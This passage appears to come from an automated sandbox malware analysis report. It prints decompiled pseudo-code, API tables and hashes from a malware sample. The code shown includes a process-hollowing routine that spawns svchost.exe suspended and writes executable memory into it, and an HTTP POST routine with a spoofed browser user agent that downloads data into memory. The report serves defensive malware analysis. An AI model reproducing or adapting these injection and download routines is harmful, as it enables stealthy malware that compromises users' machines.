                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x040020bd
                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                          0x040020d4
                                                                                                                                                                                                                                                                          0x040020e6
                                                                                                                                                                                                                                                                          0x040020f0
                                                                                                                                                                                                                                                                          0x040020fe
                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                          0x04002120
                                                                                                                                                                                                                                                                          0x04002133
                                                                                                                                                                                                                                                                          0x04002138
                                                                                                                                                                                                                                                                          0x0400213b
                                                                                                                                                                                                                                                                          0x0400214e
                                                                                                                                                                                                                                                                          0x04002168
                                                                                                                                                                                                                                                                          0x04002177
                                                                                                                                                                                                                                                                          0x04002187
                                                                                                                                                                                                                                                                          0x0400218d
                                                                                                                                                                                                                                                                          0x04002194
                                                                                                                                                                                                                                                                          0x040021c0
                                                                                                                                                                                                                                                                          0x040021c8
                                                                                                                                                                                                                                                                          0x040021fe
                                                                                                                                                                                                                                                                          0x04002204
                                                                                                                                                                                                                                                                          0x04002211
                                                                                                                                                                                                                                                                          0x0400227d
                                                                                                                                                                                                                                                                          0x0400228f
                                                                                                                                                                                                                                                                          0x04002294
                                                                                                                                                                                                                                                                          0x04002297
                                                                                                                                                                                                                                                                          0x040022b2
                                                                                                                                                                                                                                                                          0x040022ce
                                                                                                                                                                                                                                                                          0x0400235e
                                                                                                                                                                                                                                                                          0x04002363
                                                                                                                                                                                                                                                                          0x040022d0
                                                                                                                                                                                                                                                                          0x04002312
                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                          0x04002376
                                                                                                                                                                                                                                                                          0x04002396
                                                                                                                                                                                                                                                                          0x0400239e
                                                                                                                                                                                                                                                                          0x040023ec
                                                                                                                                                                                                                                                                          0x040023f2
                                                                                                                                                                                                                                                                          0x0400240a
                                                                                                                                                                                                                                                                          0x04002412
                                                                                                                                                                                                                                                                          0x04002460
                                                                                                                                                                                                                                                                          0x04002468
                                                                                                                                                                                                                                                                          0x040024a6
                                                                                                                                                                                                                                                                          0x040024ba
                                                                                                                                                                                                                                                                          0x040024c2
                                                                                                                                                                                                                                                                          0x040024e2
                                                                                                                                                                                                                                                                          0x040024ef
                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                          0x040024cb
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040024d1
                                                                                                                                                                                                                                                                          0x04002473
                                                                                                                                                                                                                                                                          0x04002480
                                                                                                                                                                                                                                                                          0x0400248d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002493
                                                                                                                                                                                                                                                                          0x0400241d
                                                                                                                                                                                                                                                                          0x0400242a
                                                                                                                                                                                                                                                                          0x04002437
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400243d
                                                                                                                                                                                                                                                                          0x040023a9
                                                                                                                                                                                                                                                                          0x040023b6
                                                                                                                                                                                                                                                                          0x040023c3
                                                                                                                                                                                                                                                                          0x040023d4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040023da
                                                                                                                                                                                                                                                                          0x0400222d
                                                                                                                                                                                                                                                                          0x0400223a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002245
                                                                                                                                                                                                                                                                          0x04002252
                                                                                                                                                                                                                                                                          0x0400225f
                                                                                                                                                                                                                                                                          0x04002270
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002276
                                                                                                                                                                                                                                                                          0x040021d5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002196
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002196

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 040020D4
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 040020E6
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C38C), ref: 040020FE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 0400210F
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002187
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 040021C0
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040021D5
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 040021FE
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 04002227
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 04002245
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04002252
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400225F
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002270
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                          • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                          • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                          • Opcode ID: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                          • Instruction ID: 24de31acf85f81f6cd7956eb3c6d21bf067972eab508d3ad9c1f9881985dd567
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27D13F71A44215ABEB28DF54CC94FAE77B9FB48304F0486D8F609B7281D678AE80CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 612 4001840-4001854 613 4001c95-4001c9b 612->613 614 400185a-400185e 612->614 614->613 615 4001864-4001868 614->615 615->613 616 400186e-4001872 615->616 616->613 617 4001878-400190a call 4007d20 InternetCrackUrlA 616->617 617->613 620 4001910-4001930 InternetOpenA 617->620 620->613 621 4001936-4001969 InternetConnectA 620->621 622 4001c88-4001c8f InternetCloseHandle 621->622 623 400196f-40019a7 HttpOpenRequestA 621->623 622->613 624 4001c7b-4001c82 InternetCloseHandle 623->624 625 40019ad-40019e5 wnsprintfA HttpAddRequestHeadersA 623->625 624->622 626 40019eb-40019f9 625->626 627 4001c6e-4001c75 InternetCloseHandle 625->627 628 4001a04-4001a26 InternetSetOptionA 626->628 629 40019fb-40019fe 626->629 627->624 630 4001a30-4001a75 call 4007d20 HttpSendRequestA 628->630 629->628 633 4001a7b-4001aa1 HttpQueryInfoA 630->633 634 4001c4c-4001c5f 630->634 636 4001aa3-4001abc call 4007dd0 633->636 637 4001ac9-4001b0f call 4007d20 HttpQueryInfoA 633->637 634->627 635 4001c61-4001c68 634->635 635->627 635->630 636->637 642 4001abe-4001ac7 636->642 643 4001b11-4001b2d call 4007dd0 637->643 644 4001b47-4001b6a VirtualAlloc 637->644 642->637 643->644 651 4001b2f-4001b39 643->651 646 4001b70-4001b93 644->646 647 4001c19 644->647 650 4001b99-4001bc9 InternetReadFile 646->650 648 4001c23-4001c4a InternetReadFile 647->648 648->634 648->648 652 4001bdb-4001be2 650->652 653 4001bcb-4001bd9 650->653 651->644 654 4001b3b-4001b41 651->654 655 4001be4 652->655 656 4001be6-4001c11 652->656 653->652 654->644 657 4001c17 655->657 658 4001c13 656->658 659 4001c15 656->659 657->634 658->657 659->650
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                          				char _v1300;
                                                                                                                                                                                                                                                                          				char _v1564;
                                                                                                                                                                                                                                                                          				void* _v1568;
                                                                                                                                                                                                                                                                          				void* _v1572;
                                                                                                                                                                                                                                                                          				char* _v1576;
                                                                                                                                                                                                                                                                          				intOrPtr _v1588;
                                                                                                                                                                                                                                                                          				char* _v1592;
                                                                                                                                                                                                                                                                          				signed short _v1612;
                                                                                                                                                                                                                                                                          				intOrPtr _v1616;
                                                                                                                                                                                                                                                                          				char* _v1620;
                                                                                                                                                                                                                                                                          				void* _v1636;
                                                                                                                                                                                                                                                                          				void* _v1640;
                                                                                                                                                                                                                                                                          				void* _v1644;
                                                                                                                                                                                                                                                                          				void* _v1648;
                                                                                                                                                                                                                                                                          				long _v1652;
                                                                                                                                                                                                                                                                          				void _v1656;
                                                                                                                                                                                                                                                                          				void _v1916;
                                                                                                                                                                                                                                                                          				long _v1920;
                                                                                                                                                                                                                                                                          				long _v1924;
                                                                                                                                                                                                                                                                          				long _v1928;
                                                                                                                                                                                                                                                                          				void* _v1932;
                                                                                                                                                                                                                                                                          				intOrPtr _v1936;
                                                                                                                                                                                                                                                                          				long _v1940;
                                                                                                                                                                                                                                                                          				long _v1944;
                                                                                                                                                                                                                                                                          				long _v1948;
                                                                                                                                                                                                                                                                          				void _v2972;
                                                                                                                                                                                                                                                                          				long _v2976;
                                                                                                                                                                                                                                                                          				int _t116;
                                                                                                                                                                                                                                                                          				void* _t117;
                                                                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                          				int _t133;
                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                          				long _t151;
                                                                                                                                                                                                                                                                          				void* _t194;
                                                                                                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                                                                                                          				void* _t196;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L37:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v1644 = 0;
                                                                                                                                                                                                                                                                          					_v1640 = 0;
                                                                                                                                                                                                                                                                          					_v1568 = 0;
                                                                                                                                                                                                                                                                          					_v1576 = "*/*";
                                                                                                                                                                                                                                                                          					_v1572 = 0;
                                                                                                                                                                                                                                                                          					E04007D20( &_v1636,  &_v1636, 0, 0x3c);
                                                                                                                                                                                                                                                                          					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                          					_v1636 = 0x3c;
                                                                                                                                                                                                                                                                          					_v1620 =  &_v1564;
                                                                                                                                                                                                                                                                          					_v1616 = 0x104;
                                                                                                                                                                                                                                                                          					_v1592 =  &_v276;
                                                                                                                                                                                                                                                                          					_v1588 = 0x104;
                                                                                                                                                                                                                                                                          					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
                                                                                                                                                                                                                                                                          					if(_t116 == 0) {
                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                          					_v1644 = _t117;
                                                                                                                                                                                                                                                                          					if(_v1644 == 0) {
                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                          					_v1640 = _t119;
                                                                                                                                                                                                                                                                          					if(_v1640 == 0) {
                                                                                                                                                                                                                                                                          						L36:
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1644);
                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
                                                                                                                                                                                                                                                                          					_v1568 = _t123;
                                                                                                                                                                                                                                                                          					if(_v1568 == 0) {
                                                                                                                                                                                                                                                                          						L35:
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1640); // executed
                                                                                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
                                                                                                                                                                                                                                                                          					_t196 = _t195 + 0x10;
                                                                                                                                                                                                                                                                          					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
                                                                                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1568); // executed
                                                                                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v1656 = 0x7530;
                                                                                                                                                                                                                                                                          					if(_a28 > 0) {
                                                                                                                                                                                                                                                                          						_v1656 = _a28;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
                                                                                                                                                                                                                                                                          					_v1652 = 1;
                                                                                                                                                                                                                                                                          					_v1648 = 0;
                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                          						_v1920 = 0x100;
                                                                                                                                                                                                                                                                          						E04007D20( &_v1916,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                          						_v1924 = 0;
                                                                                                                                                                                                                                                                          						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
                                                                                                                                                                                                                                                                          						if(_t133 == 0) {
                                                                                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                          							_t137 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                          							_v1936 = _t137;
                                                                                                                                                                                                                                                                          							if(_a32 != 0) {
                                                                                                                                                                                                                                                                          								_t137 = _a32;
                                                                                                                                                                                                                                                                          								 *_a32 = _v1936;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						E04007D20(_t137,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                          						_v1928 = 0x500000;
                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                          							_t151 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                          							_v1940 = _t151;
                                                                                                                                                                                                                                                                          							if(_v1940 > 0 && _v1940 < 0x40000000) {
                                                                                                                                                                                                                                                                          								_v1928 = _v1940;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v1932 = _t143;
                                                                                                                                                                                                                                                                          						if(_v1932 == 0) {
                                                                                                                                                                                                                                                                          							_v2976 = 0;
                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
                                                                                                                                                                                                                                                                          							} while (_v2976 > 0);
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *_a16 = _v1932;
                                                                                                                                                                                                                                                                          							 *_a20 = _v1928;
                                                                                                                                                                                                                                                                          							_v8 = 1;
                                                                                                                                                                                                                                                                          							_v1944 = _v1928;
                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                          								_v1948 = 0;
                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
                                                                                                                                                                                                                                                                          								if(_a24 != 0) {
                                                                                                                                                                                                                                                                          									 *_a24 =  *_a24 + _v1948;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v1948 == 0) {
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1932 = _v1932 + _v1948;
                                                                                                                                                                                                                                                                          								_v1944 = _v1944 - _v1948;
                                                                                                                                                                                                                                                                          								if(_v1944 > 0) {
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L29;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L32:
                                                                                                                                                                                                                                                                          						_v1648 = _v1648 + 1;
                                                                                                                                                                                                                                                                          					} while (_v8 == 0 && _v1648 < 1);
                                                                                                                                                                                                                                                                          					goto L34;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}










































                                                                                                                                                                                                                                                                          0x04001849
                                                                                                                                                                                                                                                                          0x04001854
                                                                                                                                                                                                                                                                          0x04001c95
                                                                                                                                                                                                                                                                          0x04001c9b
                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                          0x04001882
                                                                                                                                                                                                                                                                          0x0400188c
                                                                                                                                                                                                                                                                          0x04001896
                                                                                                                                                                                                                                                                          0x040018a0
                                                                                                                                                                                                                                                                          0x040018b5
                                                                                                                                                                                                                                                                          0x040018ba
                                                                                                                                                                                                                                                                          0x040018bd
                                                                                                                                                                                                                                                                          0x040018cd
                                                                                                                                                                                                                                                                          0x040018d3
                                                                                                                                                                                                                                                                          0x040018e3
                                                                                                                                                                                                                                                                          0x040018e9
                                                                                                                                                                                                                                                                          0x04001902
                                                                                                                                                                                                                                                                          0x0400190a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400191d
                                                                                                                                                                                                                                                                          0x04001923
                                                                                                                                                                                                                                                                          0x04001930
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001956
                                                                                                                                                                                                                                                                          0x0400195c
                                                                                                                                                                                                                                                                          0x04001969
                                                                                                                                                                                                                                                                          0x04001c88
                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                          0x04001994
                                                                                                                                                                                                                                                                          0x0400199a
                                                                                                                                                                                                                                                                          0x040019a7
                                                                                                                                                                                                                                                                          0x04001c7b
                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                          0x040019c2
                                                                                                                                                                                                                                                                          0x040019c8
                                                                                                                                                                                                                                                                          0x040019e5
                                                                                                                                                                                                                                                                          0x04001c6e
                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                          0x040019eb
                                                                                                                                                                                                                                                                          0x040019f9
                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                          0x04001a16
                                                                                                                                                                                                                                                                          0x04001a1c
                                                                                                                                                                                                                                                                          0x04001a26
                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                          0x04001a48
                                                                                                                                                                                                                                                                          0x04001a4d
                                                                                                                                                                                                                                                                          0x04001a50
                                                                                                                                                                                                                                                                          0x04001a6d
                                                                                                                                                                                                                                                                          0x04001a75
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001aa1
                                                                                                                                                                                                                                                                          0x04001aaa
                                                                                                                                                                                                                                                                          0x04001aaf
                                                                                                                                                                                                                                                                          0x04001ab2
                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                          0x04001abe
                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                          0x04001ad7
                                                                                                                                                                                                                                                                          0x04001adc
                                                                                                                                                                                                                                                                          0x04001adf
                                                                                                                                                                                                                                                                          0x04001b0f
                                                                                                                                                                                                                                                                          0x04001b18
                                                                                                                                                                                                                                                                          0x04001b1d
                                                                                                                                                                                                                                                                          0x04001b20
                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                          0x04001b57
                                                                                                                                                                                                                                                                          0x04001b5d
                                                                                                                                                                                                                                                                          0x04001b6a
                                                                                                                                                                                                                                                                          0x04001c19
                                                                                                                                                                                                                                                                          0x04001c23
                                                                                                                                                                                                                                                                          0x04001c3d
                                                                                                                                                                                                                                                                          0x04001c43
                                                                                                                                                                                                                                                                          0x04001b70
                                                                                                                                                                                                                                                                          0x04001b79
                                                                                                                                                                                                                                                                          0x04001b84
                                                                                                                                                                                                                                                                          0x04001b86
                                                                                                                                                                                                                                                                          0x04001b93
                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                          0x04001bbf
                                                                                                                                                                                                                                                                          0x04001bc9
                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                          0x04001be2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001bf2
                                                                                                                                                                                                                                                                          0x04001c04
                                                                                                                                                                                                                                                                          0x04001c11
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c15
                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001be4
                                                                                                                                                                                                                                                                          0x04001c4c
                                                                                                                                                                                                                                                                          0x04001c55
                                                                                                                                                                                                                                                                          0x04001c5b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001a30

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001902
                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 0400191D
                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04001956
                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,0400C2C8,00200300,00000000), ref: 04001994
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040019C2
                                                                                                                                                                                                                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 040019DD
                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 04001A16
                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04001A6D
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04001A99
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 04001B07
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 04001B57
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 04001BBF
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04001C3D
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C75
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C82
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C8F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 040019B1
                                                                                                                                                                                                                                                                          • POST, xrefs: 04001988
                                                                                                                                                                                                                                                                          • 0u, xrefs: 040019EB
                                                                                                                                                                                                                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 04001918
                                                                                                                                                                                                                                                                          • <, xrefs: 040018BD
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                                          • String ID: 0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                                          • API String ID: 880997049-2804282621
                                                                                                                                                                                                                                                                          • Opcode ID: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                          • Instruction ID: 104ecec6680c69d5e391cf9d7718dbecb1b5f59d1f4ca396f8eadafade2250d2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C10BB19442189BFB64CF50CC49FD9B7B5EB88704F0481D9E60DAA2C0DB7AAAD4CF50
                                                                                                                                                                                                                                                                          Uniqueness

